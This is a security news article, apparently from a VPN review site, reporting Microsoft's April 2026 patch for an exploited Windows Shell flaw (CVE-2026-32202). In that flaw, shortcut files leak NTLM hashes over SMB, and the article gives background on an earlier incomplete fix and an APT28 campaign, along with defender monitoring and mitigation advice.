Microsoft patches Windows Shell flaw after reports of active exploitation
6 min. read 
Published on
Microsoft has confirmed that a Windows Shell vulnerability tracked as CVE-2026-32202 has been exploited in the wild. The flaw affects the way Windows handles certain malicious shortcut files and can expose sensitive authentication data over a network.
The issue is tied to an earlier Windows Shell security bypass, CVE-2026-21510, which Microsoft patched in February 2026. Akamai researchers found that the February fix stopped the remote code execution path but left behind a separate authentication coercion weakness.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
Microsoft addressed CVE-2026-32202 in the April 2026 Patch Tuesday updates. The company later corrected its advisory details on April 27 to reflect exploitation status, exploitability, and CVSS vector information.
What CVE-2026-32202 does
CVE-2026-32202 is a Windows Shell spoofing vulnerability caused by a protection mechanism failure. NVD lists the flaw with a CVSS score of 4.3 and describes it as a network-based issue requiring user interaction.
Akamai’s research adds an important detail. In the attack chain it analyzed, the victim did not need to click the malicious shortcut file to trigger the credential leak. Windows could parse the file while rendering it in Explorer, causing an SMB connection to the attacker’s server.
That SMB connection can start an NTLM authentication handshake and send the victim’s Net-NTLMv2 hash to the attacker. Attackers can later try to relay that authentication or crack the hash offline.
At a glance
| Item | Details |
|---|---|
| Vulnerability | CVE-2026-32202 |
| Component | Windows Shell |
| Type | Spoofing, protection mechanism failure |
| CVSS score | 4.3, Medium |
| Weakness | CWE-693 |
| Exploitation status | Exploited in the wild |
| Patch | April 2026 Patch Tuesday |
| Research link | Akamai found it after reviewing the CVE-2026-21510 fix |
| Main risk | Net-NTLMv2 hash exposure through malicious LNK parsing |
| Related actor activity | APT28-linked attacks involving malicious LNK files |
How the attack chain started
The wider campaign goes back to malicious Windows shortcut files used against Ukraine and European Union targets. SecurityWeek reported that the initial activity involved Russia-linked APT28, also known as Fancy Bear, Forest Blizzard, GruesomeLarch, and Sofacy.
Akamai connected the earlier campaign to two vulnerabilities patched in February: CVE-2026-21510 in Windows Shell and CVE-2026-21513 in MSHTML. The combined chain helped attackers bypass Windows security features and execute attacker-controlled code after a victim opened a malicious shortcut file.
Microsoft’s February patch for CVE-2026-21510 added stronger trust verification before the malicious Control Panel component could execute. That helped block the direct remote code execution path.
Why the February patch was incomplete
The problem was timing inside the Windows Shell process. Microsoft’s February fix added verification later in the launch flow, but Akamai found that Windows could still resolve the remote path earlier while Explorer rendered the shortcut.
In practical terms, Windows could try to fetch or inspect a remote Control Panel file before the final SmartScreen-style trust check ran. When that remote path used a UNC format, Windows initiated an SMB connection to the attacker-controlled server.
That is why Akamai described the remaining issue as an authentication coercion flaw. The earlier patch stopped one dangerous outcome, but it did not stop the credential exposure path created by automatic file parsing.
What attackers can gain
The direct impact is not full system takeover by itself. NVD’s CVSS vector lists confidentiality impact as low, with no integrity or availability impact.
However, stolen Net-NTLMv2 hashes can still help attackers. They may use them in NTLM relay attacks, attempt offline cracking, or combine them with other weaknesses in the network.
That makes the bug more serious in enterprise environments where users browse shared folders, download attachments, or handle shortcut files from untrusted sources.
Affected Windows versions
NVD lists multiple Windows versions as affected before the April fixes. The affected configurations include Windows 11 23H2, 24H2, 25H2, and 26H1 builds below the fixed build numbers listed in the record.
The April 2026 Patch Tuesday updates address the issue. Organizations should confirm that endpoints have received the relevant cumulative update and should prioritize systems that handle external files, shared folders, and email attachments.
Security teams should also watch for systems that cannot update quickly, such as kiosk machines, shared workstations, legacy business endpoints, and jump boxes.
What defenders should monitor
- Outbound SMB traffic to external or unknown hosts.
- Windows Explorer opening folders that contain unusual
.lnkfiles. - Shortcut files with embedded UNC paths.
- NTLM authentication attempts to internet-facing systems.
- Email or archive attachments containing
.lnkfiles. - Suspicious access to WebDAV, SMB, or remote share paths.
- Authentication attempts shortly after users browse downloaded folders.
- APT28-related indicators from existing threat intelligence feeds.
Why this matters for businesses
This flaw shows how small gaps in patch logic can leave useful attack paths behind. Microsoft fixed the original code execution vector, but attackers could still abuse Windows Shell behavior to trigger credential leakage.
That matters because credential theft often drives the next stage of an intrusion. A stolen hash can help attackers move laterally, reach internal services, or escalate access if the environment still relies heavily on NTLM.
Companies should treat this as both a patching issue and an identity-security issue. Blocking unsafe file types helps, but reducing NTLM exposure and limiting outbound SMB can lower the risk of similar attacks.
How organizations can reduce the risk
- Install the April 2026 Windows security updates on all supported systems.
- Block outbound SMB traffic to the internet at the firewall.
- Disable or restrict NTLM where possible.
- Use Kerberos-first authentication in managed environments.
- Train users not to open unexpected
.lnkfiles. - Filter shortcut files from email and web downloads where practical.
- Monitor Windows Shell and Explorer behavior around suspicious folders.
- Review authentication logs for unusual NTLM activity.
- Apply Microsoft Defender and endpoint detection updates.
- Use attack surface reduction rules for suspicious file and script behavior.
FAQ
CVE-2026-32202 is a Windows Shell spoofing vulnerability caused by a protection mechanism failure. It can allow attackers to expose sensitive information over a network.
Yes. Microsoft updated its advisory to show that the vulnerability has been exploited in the wild, and The Hacker News reported that Microsoft corrected the exploited flag on April 27, 2026.
The attack uses a malicious Windows shortcut file that causes Windows Shell to resolve a remote UNC path. That can trigger an SMB connection and send the victim’s Net-NTLMv2 hash to an attacker-controlled server.
Akamai found that the remaining flaw could trigger without a click because Windows Explorer parses shortcut files while rendering folder contents. Microsoft’s advisory still lists user interaction in the CVSS vector.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages